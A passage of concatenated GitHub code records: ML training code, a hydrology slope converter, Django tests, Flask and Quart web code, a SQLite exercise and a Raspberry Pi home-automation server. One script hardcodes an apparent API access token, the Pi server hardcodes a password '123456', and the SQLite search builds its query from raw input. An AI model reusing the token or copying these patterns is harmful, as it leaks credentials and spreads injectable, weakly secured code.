역추적/9019_DSLR2.py","file_name":"9019_DSLR2.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"71430347478","text":"\"\"\"\nBased on code from newer implementation of Meta Weight Net paper\nhttps://arxiv.org/abs/1902.07379\nhttps://github.com/ShiYunyi/Meta-Weight-Net_Code-Optimization\n\n\"\"\"\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.nn.utils import clip_grad_norm_\nfrom copy import deepcopy\nfrom .default_dataset import TsDataset\nfrom model.base_models import *\n\nfrom model.ns_methods.meta_weight_net.meta import MetaSGD\nfrom model.ns_methods.meta_weight_net.model import MetaNetMLP\nfrom model.ns_model_wrappers.model_wrapper import ModelWrapper\n\n\nclass MetaWeightNet(ModelWrapper):\n def __init__(self, training_args, model_args, loss=F.mse_loss):\n self.model_args = model_args.copy()\n self.model_class = eval(self.model_args.pop('name'))\n\n self.meta_net = MetaNetMLP(\n hidden_size=training_args['meta_net_hidden_size'],\n num_layers=training_args['meta_net_num_layers']\n )\n\n self.loss = loss\n\n self.n_epochs = training_args['n_epochs']\n self.batch_size = training_args['batch_size']\n self.clip_grad = training_args['clip_grad']\n\n self.opt = optim.SGD\n self.lr = training_args['lr']\n self.opt_args = {\n 'lr': self.lr,\n 'weight_decay': training_args['wd'],\n 'momentum': training_args['momentum']\n }\n\n self.meta_opt = optim.Adam(self.meta_net.parameters(),\n lr=training_args['meta_lr'],\n weight_decay=training_args['meta_wd'])\n self.meta_interval = training_args['meta_interval']\n\n self.model = None\n return\n\n def fit(self, X_tr, y_tr, X_val, y_val):\n loader = DataLoader(TsDataset(X_tr, y_tr), batch_size=self.batch_size, shuffle=True)\n meta_loader = DataLoader(TsDataset(X_val, y_val), batch_size=self.batch_size, shuffle=True)\n meta_loader_iter = iter(meta_loader)\n\n validation_losses = np.array([np.inf])\n best_model = None\n\n model = self.model_class(self.model_args)\n opt = self.opt(model.parameters(), **self.opt_args)\n\n for epoch in range(self.n_epochs):\n\n for iteration, (X, y) in enumerate(loader):\n model.train()\n\n if (iteration + 1) % self.meta_interval == 0:\n pseudo_model = self.model_class(self.model_args)\n pseudo_model.load_state_dict(model.state_dict())\n pseudo_model.train()\n\n pseudo_outputs = pseudo_model(X)\n pseudo_loss_vector = self.loss(pseudo_outputs, y, reduction='none')\n pseudo_loss_vector_reshape = torch.reshape(pseudo_loss_vector, (-1, 1))\n pseudo_weight = self.meta_net(pseudo_loss_vector_reshape.data)\n pseudo_loss = torch.mean(pseudo_weight * pseudo_loss_vector_reshape)\n\n pseudo_grads = torch.autograd.grad(pseudo_loss, pseudo_model.parameters(), create_graph=True)\n\n pseudo_optimizer = MetaSGD(pseudo_model, pseudo_model.parameters(), lr=self.lr)\n pseudo_optimizer.load_state_dict(opt.state_dict())\n pseudo_optimizer.meta_step(pseudo_grads)\n\n del pseudo_grads\n\n try:\n meta_X, meta_y = next(meta_loader_iter)\n except StopIteration:\n meta_loader_iter = iter(meta_loader)\n meta_X, meta_y = next(meta_loader_iter)\n\n meta_outputs = pseudo_model(meta_X)\n meta_loss = self.loss(meta_outputs, meta_y)\n\n self.meta_opt.zero_grad()\n meta_loss.backward()\n self.meta_opt.step()\n\n outputs = model(X)\n loss_vector = self.loss(outputs, y, reduction='none')\n loss_vector_reshape = torch.reshape(loss_vector, (-1, 1))\n\n 
with torch.no_grad():\n weight = self.meta_net(loss_vector_reshape)\n\n loss = torch.mean(weight * loss_vector_reshape)\n\n opt.zero_grad()\n loss.backward()\n clip_grad_norm_(model.parameters(), self.clip_grad)\n opt.step()\n\n # Evaluate validation loss for ES\n model.eval()\n with torch.no_grad():\n val_loss = self.loss(model(X_val), y_val).item()\n if (val_loss < validation_losses).all():\n best_model = deepcopy(model)\n validation_losses = np.append(validation_losses, [val_loss])\n\n assert(best_model is not None)\n self.model = best_model\n\n def predict(self, x):\n assert(self.model is not None)\n self.model.eval()\n return self.model(x)\n\n def update(self, X_tr, y_tr, X_val, y_val):\n return\n\n def reset(self):\n self.model = None","repo_name":"stefanosbennett/tsds_aaai_24","sub_path":"model/ns_model_wrappers/meta_weight_net_wrapper.py","file_name":"meta_weight_net_wrapper.py","file_ext":"py","file_size_in_byte":5027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"39852954869","text":"import pandas as pd\r\nimport requests\r\nimport openpyxl\r\nimport time\r\nfrom tkinter.filedialog import askopenfilename\r\nfrom collections import defaultdict\r\n\r\n\r\npath = str(askopenfilename())\r\n\r\ntry:\r\n wb = openpyxl.load_workbook(str(path))\r\nexcept FileNotFoundError:\r\n message = 'Укажите путь к таблице!'\r\nsheet = wb.worksheets[0]\r\naddress = []\r\n\r\nfor i in range(1, sheet.max_row):\r\n if sheet.cell(row=i, column=1).value is None:\r\n max_row = i - 1\r\n print(max_row)\r\n break\r\n else:\r\n max_row = sheet.max_row\r\n print(max_row)\r\n\r\nfor i in range(2, max_row + 1):\r\n address.append(str(sheet.cell(row=i, column=1).value))\r\n\r\n\r\nprint(address)\r\nprint('da')\r\ndescription = []\r\ndesc = defaultdict(list)\r\nprint(desc)\r\nfor i in range(0,len(address)):\r\n try:\r\n print(address[i])\r\n response = requests.get(\"https://data.42matters.com/api/v2.0/android/apps/lookup.json?p=\"+str(address[i])+\"&fields=similar&lang=en&access_token=1300b9852763b84f7ae8326465e62bbfba660c3c\")\r\n print(response.json())\r\n desc[str(address[i])]=[]\r\n for j in range(0,len(response.json()['similar'])):\r\n print(response.json()['similar'][0])\r\n description.append(response.json()['similar'][j])\r\n desc[address[i]].append(str(response.json()['similar'][j]))\r\n print(desc)\r\n except KeyError:\r\n time.sleep(10)\r\n print('KeyError: token is expired or app was deleted')\r\n print(print(response.json()))\r\n\r\nprint(desc)\r\n\r\nwb = openpyxl.load_workbook(str(path))\r\nsheet = wb.worksheets[0]\r\nfor i in range(0, len(address)):\r\n sheet.cell(row=i + 2, column=5).value = str(desc[address[i]])\r\nwb.save(str(path))\r\nprint('ok')\r\n\r\n","repo_name":"AdvDevBaf/Mytarger-GeoCoder-different_stuff","sub_path":"google_description.py","file_name":"google_description.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"30763953111","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jan 31 15:57:57 2022\r\n\r\n@author: mugalsamrat.dahal\r\n\"\"\"\r\nimport os\r\nimport glob\r\nimport pandas as pd\r\n#import numpy as np\r\n\r\n### Convert slope file into two different OFEs\r\n#readdir = \"F:\\\\WORK\\\\Project_2\\\\save\\\\Saved_watershed\\\\closing-marquetry\\\\wepp\\\\runs\"\r\n#writedir = \"F:\\\\WORK\\\\Project_2\\\\WEPPwatershed\\\\springflatcreek\\\\wepp\\\\runs\"\r\n\r\ndef convslps(readdir,writedir):\r\n 
os.chdir(readdir)\r\n #os.getcwd()\r\n \r\n slplist = glob.glob(\"*.slp\")\r\n \r\n def mysolfunct(x):\r\n b='w' in list(x)[1]\r\n return not b\r\n \r\n c=[mysolfunct(x) for x in slplist] \r\n \r\n from itertools import compress\r\n nslps=list(compress(slplist,c))\r\n \r\n def interpol(x1,x2,y1,y2,x):\r\n '''calculates interpolation using two points of x & y coordinates'''\r\n y = round(y1 + (x-x1)*((y2-y1)/(x2-x1)),4)\r\n return y \r\n \r\n \r\n for slopnm in nslps:\r\n \r\n m = open(slopnm, 'r')\r\n my = m.readlines()\r\n slplen = float(my[3].split(\" \")[1]) ## This is slope length\r\n nps = float(my[3].split(\" \")[0]) ## number of points in the slope\r\n slppnts = my[4].split(\", \")\r\n \r\n slppnt2 = list()\r\n for p in slppnts:\r\n t = p.split(\" \")\r\n for a in t:\r\n slppnt2.append(a) \r\n \r\n slppnt2.remove('')\r\n \r\n ldist=list()\r\n lslp = list()\r\n for n in range(0,(len(slppnt2)-1)):\r\n if n%2==0:\r\n ldist.append(slppnt2[n])\r\n lslp.append(slppnt2[n+1])\r\n \r\n \r\n slppnt3 = [list(x) for x in zip(ldist,lslp)]\r\n slparr = pd.DataFrame(slppnt3, columns=['dist', 'slope'])\r\n \r\n #### This part will find the minimum absolute value ###########\r\n diff = list()\r\n for v in ldist:\r\n s = abs(float(v) - 0.50)\r\n diff.append(s)\r\n ######################################################\r\n ####### Use the minimum value to identify the number in the middle\r\n for m in range(0,(len(diff)-1)):\r\n if diff[m]-min(diff)==0:\r\n minind = m\r\n break\r\n ############################################################\r\n ### Now use the middle value to create a middle slope point #######\r\n \r\n ldist = [round(float(i),4) for i in ldist]\r\n lslp = [round(float(i),4) for i in lslp]\r\n middis = 0.50\r\n mid_slop = interpol(ldist[minind], ldist[minind+1],lslp[minind], lslp[minind+1],middis)\r\n #############################\r\n \r\n ### join distance and slope values ###\r\n slppnt4 = [list(x) for x in zip(ldist,[str(i) for i in lslp])]\r\n \r\n ### separate ofe 1 and 2\r\n ##add midpoint values\r\n \r\n ###### Some times the point closest to minimum value can fall closer to \r\n ##### ofe 2, in that case there needs to be a guard\r\n ###so that value greater than 0.5 is not appenede to ofe 1\r\n \r\n \r\n if slppnt4[minind][0]>0.50:\r\n ofe1 = slppnt4[0:minind]\r\n ofe2 = slppnt4[minind:(len(ldist)+1)]\r\n minind = minind-1 ## if this condition is fulfill there is a new minind\r\n else:\r\n ofe1 = slppnt4[0:minind+1]\r\n ofe2 = slppnt4[(minind+1):(len(ldist)+1)]\r\n if ofe1[minind][0] < 0.50: ### If there is already a 0.50 than i dont have to append to the top ofe\r\n ofe1.append([0.50, str(mid_slop)])\r\n ofe2.insert(0, [0.50, str(mid_slop)])\r\n \r\n ### Need to change the distance from top values \r\n ##now that ofe is broken into 2\r\n ldistleno1 = [i[0]*slplen for i in ofe1]\r\n ldistleno1 = [str(round(i/(slplen/2),4)) for i in ldistleno1]\r\n np_ofe1 = len(ldistleno1)\r\n \r\n ldistleno2 = [i[0]*slplen for i in ofe2]\r\n ldistleno2 = [str(round(((i-(slplen/2))/(slplen/2)),4)) for i in ldistleno2]\r\n np_ofe2 = len(ldistleno2)\r\n \r\n joiner1 = \" \"\r\n joiner2 = \", \"\r\n \r\n #### dissolve the list and prepare for slope file\r\n \r\n newofe1 = [list(x) for x in zip(ldistleno1,[i[1] for i in ofe1])]\r\n newofe1 = joiner1.join([joiner2.join(i) for i in newofe1])\r\n newofe2 = [list(x) for x in zip(ldistleno2,[i[1] for i in ofe2])]\r\n newofe2 = joiner1.join([joiner2.join(i) for i in newofe2])\r\n \r\n npandlen_ofe1 = str(np_ofe1)+\" 
\"+str(round(slplen/2,4))+\"\\n\"\r\n npandlen_ofe2 = str(np_ofe2)+\" \"+str(round(slplen/2,4))+\"\\n\"\r\n \r\n my[1]='2\\n' ## change number of ofe paramter\r\n \r\n my[3] = npandlen_ofe1 ## change parameter slope length and points\r\n my[4] = newofe1+\"\\n\" ## replace new values\r\n my.append(npandlen_ofe2)\r\n my.append(newofe2)\r\n \r\n myfile = open(writedir+\"\\\\\"+slopnm, \"w+\")\r\n myfile.writelines(my)\r\n myfile.close()\r\n\r\n\r\n","repo_name":"memugal33/Hydrology_and_Erosion_WEPP","sub_path":"converttotwoOFEslope.py","file_name":"converttotwoOFEslope.py","file_ext":"py","file_size_in_byte":4999,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"30945356026","text":"from django.core.exceptions import ValidationError\nfrom django.test import TestCase\n\nfrom main.utils import extension, slugified_file_location, validate_file_ext\n\n\nclass NamedObject(object):\n def __init__(self, name):\n self.name = name\n\n\nclass UnnamedObject(object):\n def __str__(self):\n return 'unnamed object'\n\n\nclass MainUtilsTestCase(TestCase):\n\n def test_extension(self):\n for input, expected_output in [\n ('picture.png', 'png'),\n ('picture.of.me.png', 'png'),\n ('picture', None),\n (None, None),\n (True, None),\n (1, None),\n (object, None),\n ]:\n self.assertEqual(extension(input), expected_output)\n\n def test_slugified_file_location(self):\n for instance, filename, expected_output in [\n (NamedObject('mnl video'), 'cLoaG.mov', 'av/mnl-video.mov'),\n (NamedObject('mnl audio'), 'NCu2H.mp3', 'av/mnl-audio.mp3'),\n (NamedObject('mnl image'), 'wo3BD.png', 'img/mnl-image.png'),\n (NamedObject('mnl doc'), 'Bhp1j.pdf', 'doc/mnl-doc.pdf'),\n (UnnamedObject(), 'FAF1I.docx', 'doc/unnamed-object.docx'),\n ]:\n self.assertEqual(\n slugified_file_location(instance, filename), expected_output)\n\n def test_validate_file_ext(self):\n for field, filename, allowed_exts in [\n ('logo', 'whalers.bmp', ['png', 'jpg']),\n ('goal_horn', 'whalers.ogg', ['mp3',]),\n ('stats', 'fall-2020.csv', ['xlsx',]),\n ]:\n with self.assertRaises(ValidationError):\n validate_file_ext(field, filename, allowed_exts)\n","repo_name":"monday-night-lights/mnl-api","sub_path":"django/main/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"15990704455","text":"import time\nfrom htmlmin.main import minify\nfrom flask import request, current_app, g\nfrom app.classes.bashcolors import colors\n\ndef before_request():\n #print( \"Path: %s\" % request.path )\n #print( \"Script root: %s\" % request.script_root )\n #print( \"Base URL: %s\" % request.base_url )\n #print( \"URL: %s\" % request.url )\n #print( \"URL root: %s\" % request.url_root )\n remote_addr = request.remote_addr\n if remote_addr == \"\" or remote_addr == None:\n remote_addr = request.headers.getlist(\"X-Forwarded-For\")[0]\n\n validateRemoteIP( remote_addr )\n\n found = False\n for i in range( 0, len( current_app.config[ 'TRACKING_IGNORE_EXT' ])):\n if( current_app.config[ 'TRACKING_IGNORE_EXT' ][ i ] in request.path ):\n found = True\n if( not found ):\n current_app.logger.debug( colors.getDebug() + \"Inside Main->before_request | REMOTE ADDRESS = \" + remote_addr + \" | REQUEST ADDRESS = \" + request.path )\n\n current_app.config[ 'REQUEST_CORE_URL' ] = found\n g.start = time.time()\n \ndef teardown_request( error = None ):\n res = getattr( g, 'resource', None )\n 
if res is not None:\n res.release()\n \ndef after_request( response ):\n if( \"REQUEST_CORE_URL\" in current_app.config and not current_app.config[ 'REQUEST_CORE_URL' ]):\n current_app.logger.info( colors.getInfo() + \"Inside Main->returnResponse | app.after_request\" )\n if( request.is_xhr ):\n print( \"XHR request\" )\n if( current_app.config[ 'MINIFY_PAGE' ]):\n \tif response.content_type == u'text/html; charset=utf-8':\n \tresponse.set_data( minify( response.get_data( as_text = True ), remove_comments = True ))\n return response\n \ndef injectHeaders( response ):\n if( \"REQUEST_CORE_URL\" in current_app.config and not current_app.config[ 'REQUEST_CORE_URL' ]):\n try:\n requests, remaining, reset = map( int, g.view_limits )\n except( AttributeError, ValueError ):\n pass\n else:\n response.headers[ \"X-RateLimit-Remaining\" ] = remaining\n response.headers[ \"X-RateLimit-Limit\" ] = requests\n response.headers[ \"X-RateLimit-Reset\" ] = reset\n current_app.logger.debug( colors.getDebug() + \"Inside Main->injectHeaders | Response headers set with rate limiting\" )\n try:\n diff = 0\n if current_app.config[ \"DEBUG\" ]:\n if( g.start ):\n diff = str( time.time() - g.start )\n if( \"REQUEST_CORE_URL\" in current_app.config and not current_app.config[ 'REQUEST_CORE_URL' ]):\n current_app.logger.debug( colors.getDebug() + request.path + \" - Exec Time: %s\" % diff )\n response.headers[ \"X-Frame-Options\" ] = \"SAMEORIGIN\"\n response.headers[ \"X-Runtime\" ] = diff\n response.headers[ \"X-Powered-By\" ] = current_app.config[ \"APP_POWERED_BY\" ]\n response.headers[ \"X-XSS-Protection\" ] = \"1; mode=block\"\n response.headers[ \"X-Content-Type-Options\" ] = \"nosniff\"\n response.headers[ \"cache-control\" ] = current_app.config[ 'CACHE_HTTP_HEADER' ]\n response.headers[ \"content-length\" ] = len( response.response[ 0 ])\n except:\n # Remove app.logger to fix issue 0002\n pass\n return response\n\ndef validateRemoteIP( addr ):\n if( addr in current_app.config[ 'BLOCKED_IP' ]):\n raise RequestFromBlockedIP()","repo_name":"robjporter/PYTHON-APIServer-1","sub_path":"app/classes/requests.py","file_name":"requests.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"8167304817","text":"import sys\n\nclass MFuns:\n\n \"\"\"\n God of gamblers\n 时间限制:1000 ms | 内存限制:65535 KB\n 难度:5\n 描述\n Have you ever seen the movie \"God if gamblers\"?\n Yes, it's very exciting! You must be attracted by the deft skill of the god of gamblers.\n He can play the cards as he wish. The action of shuffling cards is extramely handsome.\n How I wish I had such a pair of hands! However, it will be only a dream forever.\n\n There is a popular method of shuffling cards. Suppose you have a stack of 2*n cards.\n Then mix the two stacks of cards uniformly. That is, the ith card of the original stack is placed in the p(i)th\n position of the new stack of the new stack where p(i) is a function defined like this:\n p(i) = 2 * i ( i <= n )\n p(i) = 2 * ( i - n ) - 1 ( i > n)\n Give you an inter n. Calculate the minimum positive number of shuffling that makes the cards have the same order\n the original stack.\n\n 输入\n A line containing an integer n whish is less than 10^9\n There are multiple test cases. 
Input will be terminated EOF\n 输出\n A line containing an integer which indicates the minimum positive number of shuffles.\n 样例输入\n 1\n 样例输出\n 2\n \"\"\"\n\n def shuffling_card(self):\n n = int(input(\"Input n:\"))\n s = list(range(1, 2 * n + 1))\n result = s.copy()\n count = 1\n\n self.shuffling(n, result)\n while not result == s:\n self.shuffling(n, result)\n count += 1\n print(count)\n\n def shuffling(self, n, result):\n for i in range(1, 2 * n + 1):\n if result[i - 1] <= n:\n result[i - 1] = 2 * result[i - 1]\n else:\n result[i - 1] = 2 * (result[i - 1] - n) - 1\n\n \"\"\"\n 蚂蚁的难题(六)\n 时间限制:1000 ms | 内存限制:65535 KB\n 难度:5\n 描述\n 经过一系列的训练,蚂蚁的烹饪手艺终于可以见人了。他烹饪了n盘食品,编号1~n,每一盘都有一个美味价值Ai。\n 现在他要选取不超过 k 盘并且任意两盘编号不能够相邻,送给好朋友PIAOYI品尝。因为上次的“试吃”事件让PIAOYI很不开心,\n 所以蚂蚁决定选取足够大的美味价值来向PIAOYI道歉。但是蚂蚁又不知道该选那些食品,请你帮帮他吧?\n \n 输入\n 有多组测试数据。\n 对于每组测试数:\n 第一行有两个数n,k(n<=100000, k <= n/2)分别代表蚂蚁烹饪了n盘食品,最多选取k盘.\n 第二行有n个数字 Ai (|Ai| <= 1000000)表示每一盘食品的美味价值。\n 输出\n 对于每组数据,输出蚂蚁能够选取的最大值。\n 样例输入\n 6 3 \n 100 1 -1 100 1 -1\n 样例输出\n 200\n \"\"\"\n\n def ant6(self):\n input1 = input(\"总盘数, 最多选取数量:\")\n limit = int(input1.split(\" \")[1])\n input2 = input(\"输入食品数据:\")\n food = input2.split(\" \")\n self.get_max_ai(food, limit)\n\n def get_max_ai(self, food, limit):\n print(\"Max Ai: \", self.find_ai(0, food, food, limit))\n\n def find_ai(self, ai_count, food, residue_list, limit):\n if len(residue_list) == 0 or limit <= 0:\n return ai_count\n\n ai_count_list = []\n limit_copy = 0\n for i in range(len(residue_list)):\n if residue_list[i] is not None:\n residue_list_copy = residue_list.copy()\n limit_copy = limit\n ai_count_list.insert(i, ai_count)\n\n if i != 0:\n residue_list_copy[i - 1] = None\n if i != len(food) - 1:\n residue_list_copy[i + 1] = None\n residue_list_copy[i] = None\n print(\"Residue: \", residue_list_copy)\n\n limit_copy -= 1\n ai_count_list[i] += int(food[i])\n ai_count_list[i] = self.find_ai(ai_count_list[i], food, residue_list_copy, limit_copy)\n print(\"Branch Line Ai: \", ai_count_list[i])\n else:\n ai_count_list.insert(i, None)\n\n while ai_count_list.__contains__(None):\n ai_count_list.remove(None)\n\n if len(ai_count_list) == 0:\n return int(food[0])\n else:\n return max(ai_count_list)\n\n \"\"\"\n 最舒适的路线\n 时间限制:5000 ms | 内存限制:65535 KB\n 难度:5\n 描述\n 异形卵潜伏在某区域的一个神经网络中。其网络共有N个神经元(编号为1,2,3,…,N),这些神经元由M条通道连接着。\n 两个神经元之间可能有多条通道。异形卵可以在这些通道上来回游动,但在神经网络中任一条通道的游动速度必须是一定的。\n 当然异形卵不希望从一条通道游动到另一条通道速度变化太大,否则它会很不舒服。现在异形卵聚居在神经元S点,\n 想游动到神经元T点。它希望选择一条游动过程中通道最大速度与最小速度比尽可能小的路线,也就是所谓最舒适的路线。\n \n 输入\n 第一行: K 表示有多少组测试数据。 \n 接下来对每组测试数据:\n 第1行: N M\n 第2~M+1行: Xi Yi Vi (i=1,…..,M)\n 表示神经元Xi 到神经元Yi之间通道的速度必须是Vi\n 最后一行: S T ( S  T )\n \n 【约束条件】\n 2≤K≤5 1 /\n path = '/'\n if path != request.path:# redirect if something has changed\n return redirect(path)\n\nif sys.platform != 'linux':\n @app.after_request\n async def cache_headers(r):\n r.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate, public, max-age=0\"\n r.headers[\"Pragma\"] = \"no-cache\"\n r.headers[\"Expires\"] = \"0\"\n return r\n\n@app.before_serving\nasync def schedule_cache():\n asyncio.ensure_future(cache.recache(cache))\n\n@app.route('/')\nasync def homepage():\n return await render_template(\"index.html\", projects=cache.projects, socials=cache.socials, misc_info=misc_info(request))\n\n@app.route('/legal')\nasync def legal():\n return await render_template(\"legal.html\", characters=cache.characters, misc_info=misc_info(request))\n\n@app.route('/safety')\nasync def safety():\n return await render_template(\"safety.html\", 
misc_info=misc_info(request, safety=True))\n\n@app.route('/hotlines')\nasync def hotlines():\n return await render_template(\"hotlines.html\", misc_info=misc_info(request, safety=True))\n\n@app.route('/bongo')\nasync def bongo():\n return await render_template(\"bongo.html\", bongo_images=cache.bongo_images, misc_info=misc_info(request))\n\n@app.route('/discord')\nasync def discord():\n return redirect(cache.socials['discord'])\n\n@app.route('/license')\n@app.route('/license.txt')\nasync def license():\n return await app.send_static_file(\"license.txt\")\n\n@app.route('/robots.txt')\nasync def robots():\n return await app.send_static_file(\"robots.txt\")\n\n@app.route('/sitemap.xml')\nasync def sitemap():\n return await app.send_static_file(\"sitemap.xml\")\n\n@app.route('/files/')\nasync def old_file_route(file_name):\n return await app.send_static_file(file_name)\n\n@app.errorhandler(404)\nasync def page_not_found(e):\n if request.path in [\"/favicon.ico\", \"/apple-touch-icon.png\", \"/browserconfig.xml\"]:# Favicons!\n return await app.send_static_file(f\"favicon{request.path}\")\n return await render_template(\"404.html\", misc_info=misc_info(request, \"\")), 404\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=8000, debug=True)\n","repo_name":"DuckMasterAl/website","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":3040,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"85"} +{"seq_id":"16113642830","text":"\"\"\"\nEjercicio N° 1\n\nEn este ejercicio tendréis que crear una tabla llamada Alumnos que constará de tres columnas: la columna id de tipo entero, la columna nombre que será de tipo texto y la columna apellido que también será de tipo texto.\n\nUna vez creada la tabla, tenéis que insertarle datos, como mínimo tenéis que insertar 8 alumnos a la tabla.\n\nPor último, tienes que realizar una búsqueda de un alumno por nombre y mostrar los datos por consola.\n\"\"\"\n\nimport sqlite3\nimport sys\n\nruta = sys.path\n\nconn = sqlite3.connect(ruta[0]+\"/users.db\")\n\ncursor = conn.cursor()\n\ndef select_alumnos():\n\n rows = cursor.execute(\"SELECT * FROM Alumnos\")\n\n print(\"Los Alumnos Son: \\n\")\n\n for row in rows:\n print(row)\n\n print(\"\\n\")\n\nselect_alumnos()\n\ndef insert_alumnos(nombre, apellido):\n\n conn = sqlite3.connect(ruta[0]+\"/users.db\")\n\n cursor = conn.cursor()\n\n sql_query = \"\"\"INSERT INTO Alumnos(nombre, apellido) VALUES(?, ?);\"\"\"\n\n cursor.execute(sql_query, (nombre, apellido))\n\n conn.commit()\n\n cursor.close()\n\n conn.close()\n\nentradas = input(\"Deseas agregar un nuevo Registro S/N.?: \")\n\nwhile entradas.lower() != \"n\":\n\n nombre = None\n apellido = None\n\n nombre = input(\"Ingrese el Nombre del nuevo alumno: \")\n apellido = input(\"Ingrese el apellido del nuevo alumno: \")\n\n insert_alumnos(nombre, apellido)\n\n continuar = input(\"Deseas agregar un nuevo alumno S/N: \")\n\n if continuar.lower() != \"s\":\n break\n\ndef search_alumnos(nombre):\n\n rows = cursor.execute(f\"SELECT nombre, apellido FROM Alumnos WHERE nombre = '{nombre}'\")\n\n #dato = rows.fetchone()\n #print(dato)\n print(\"Nombre | Apellido \\n\")\n for row in rows:\n print(row)\n\nprint(\"Vamos a buscar un alumno ingresando el nombre\")\nnombre_buscado = input(\"Ingrese el nombre a buscar: 
\")\n\nsearch_alumnos(nombre_buscado)\n\ncursor.close()\n\nconn.close()","repo_name":"alpolo1991/Open-BootCamp","sub_path":"Curso_de_Python/tema_11_sqlite/ejercicio_1.py","file_name":"ejercicio_1.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"74433756757","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport datetime\nfrom aiohttp import web\nfrom multiprocessing import Process\nfrom email import encoders\nfrom email.header import Header, decode_header\nfrom email.mime.text import MIMEText\nfrom email.parser import Parser\nfrom email.utils import parseaddr, formataddr\nimport poplib\nimport re, time, json, logging, hashlib, base64, asyncio, os\nimport smtplib\nfrom urllib import request\nimport time\nimport aiomysql\nfrom apscheduler.schedulers.asyncio import AsyncIOScheduler\nfrom bs4 import BeautifulSoup\nimport requests\nfrom coroweb import get, post\nfrom orm import execute, select\nfrom motor import zheng, fan, stopC, zheng2, fan2, stop2\nfrom picamera import PiCamera\nimport time, threading\nfrom email.mime.base import MIMEBase\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom pingUtil import getHome\nfrom predict import get_winstate\nfrom killps import kill_video, kill_natapp\nfrom models import User\nimport pytz\n\n__author__ = 'zhou'\n\n' url handlers '\n\nimport RPi.GPIO as GPIO\nimport Adafruit_DHT\n\nimport sys\nfrom sys import path\n\npath.append('/home/pi')\nimport config_default\n\n# 输入邮件地址, 口令和POP3服务器地址:\nemail_config = config_default.config['email']\n\nemail = email_config['email'] # 你的email 的地址\nfrom_addr = email_config['from_addr'] # 你的email 的地址\npassword = email_config['password'] # 你的email 的密码\nto_addr = email_config['to_addr'] # email 的目的地址\nsmtp_server = email_config['smtp_server'] # smtp服务器 的地址\npop3_server = email_config['pop3_server'] # pop3服务器 的地址\nchuang_state = None\ndeng_state = None\nsched = None\nCOOKIE_NAME = 'awesession'\n_COOKIE_KEY = \"configs.session.secret\"\n\n\n# 计算加密cookie:\ndef user2cookie(user, max_age):\n # build cookie string by: id-expires-sha1\n expires = str(int(time.time() + max_age))\n s = '%s-%s-%s-%s' % (user['id'], user['passwd'], expires, _COOKIE_KEY)\n L = [user['id'], expires, hashlib.sha1(s.encode('utf-8')).hexdigest()]\n return '-'.join(L)\n\n\nasync def cookie2user(cookie_str):\n '''\n Parse cookie and load user if cookie is valid.\n '''\n user = None\n if not cookie_str:\n return None\n try:\n L = cookie_str.split('-')\n if len(L) != 3:\n return None\n uid, expires, sha1 = L\n if int(expires) < time.time():\n return None\n logging.info(\"-----------------\" + uid)\n if uid == '1':\n user = {'id': '1', 'passwd': '123456'}\n if user is None:\n return None\n s = '%s-%s-%s-%s' % (uid, user['passwd'], expires, _COOKIE_KEY)\n if sha1 != hashlib.sha1(s.encode('utf-8')).hexdigest():\n logging.info('invalid sha1')\n return None\n user['passwd'] = '******'\n return user\n except Exception as e:\n logging.exception(e)\n return None\n\n\ndef init_deng_state():\n '''\n 灯的初始状态\n '''\n global deng_state\n GPIO.setmode(GPIO.BOARD)\n GPIO.setup(12, GPIO.OUT)\n GPIO.setup(40, GPIO.IN)\n if GPIO.input(12) == 1:\n deng_state = 'open'\n else:\n deng_state = 'close'\n\ndef init_chuang_state():\n '''\n 窗帘的初始状态,是用tensorflow来判断的,这个地点也是此项目的亮点\n '''\n global chuang_state\n img_url = take_camera()\n win_state = get_winstate(img_url)\n if win_state == 'chuang_close':\n chuang_state = 'close'\n if 
win_state == 'chuang_open':\n chuang_state = 'open'\n print('+++++++++++window_state++++++++++++++' + chuang_state)\n\n\ndef guess_charset(msg):\n charset = msg.get_charset()\n if charset is None:\n content_type = msg.get('Content-Type', '').lower()\n pos = content_type.find('charset=')\n if pos >= 0:\n charset = content_type[pos + 8:].strip()\n return charset\n\n\ndef decode_str(s):\n value, charset = decode_header(s)[0]\n if charset:\n value = value.decode(charset)\n return value\n\n\ndef print_info(msg, indent=0):\n value = decode_str(msg.get('Subject', ''))\n hdr, addr = parseaddr(msg.get('From', ''))\n if (msg.is_multipart()):\n parts = msg.get_payload()\n for n, part in enumerate(parts):\n print('%spart %s' % (' ' * indent, n))\n print('%s--------------------' % (' ' * indent))\n print_info(part, indent + 1)\n else:\n content_type = msg.get_content_type()\n if content_type == 'text/plain' or content_type == 'text/html':\n content = msg.get_payload(decode=True)\n charset = guess_charset(msg)\n if charset:\n content = content.decode(charset)\n print('%sText: %s' % (' ' * indent, content + '...'))\n else:\n print('%sAttachment: %s' % (' ' * indent, content_type))\n return addr, value, content\n\n\n@get('/api/schJob')\nasync def sch_job():\n '''\n 定时查询邮件的任务,参考的是廖雪峰的网站\n '''\n server = poplib.POP3(pop3_server)\n server.set_debuglevel(0)\n server.user(email)\n server.pass_(password)\n # stat()返回邮件数量和占用空间:\n # 